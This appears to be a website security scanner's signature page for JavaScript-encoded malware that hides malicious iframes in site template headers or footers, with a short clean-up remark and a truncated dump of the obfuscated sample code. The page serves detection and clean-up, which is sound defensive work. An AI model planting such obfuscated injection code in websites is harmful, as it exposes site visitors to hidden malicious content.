SiteCheck Signatures

  1. Home
  2. Docs
  3. SiteCheck Signatures
  4. malware-entry-mwiframehd301



Javascript encoded malware used to hide malicious iframes from multiple sources.

Some domains used as intermediaries:


Any web site.

Clean up:

This malware is generally hidden inside the template footer or header.

Malware dump (sample of malware):

var yS="9ea0a090a982a48b8ab08cb79aa798b2989eb7b388a590af9f9c87a086b68793b9";var Pjs="Pjs";var tE=36198;function p(t){    function o(R){var At=false;var h = -1;var WO=new Array();var E = '';var bx;if(bx!='qL' && bx != ''){bx=null};R = new S(R);var X =[0,182][0];this.f="";var Io =[0][0];for (X=R[W("elgnht", [1,0])]-h;X>=Io;X=X-[1,125,..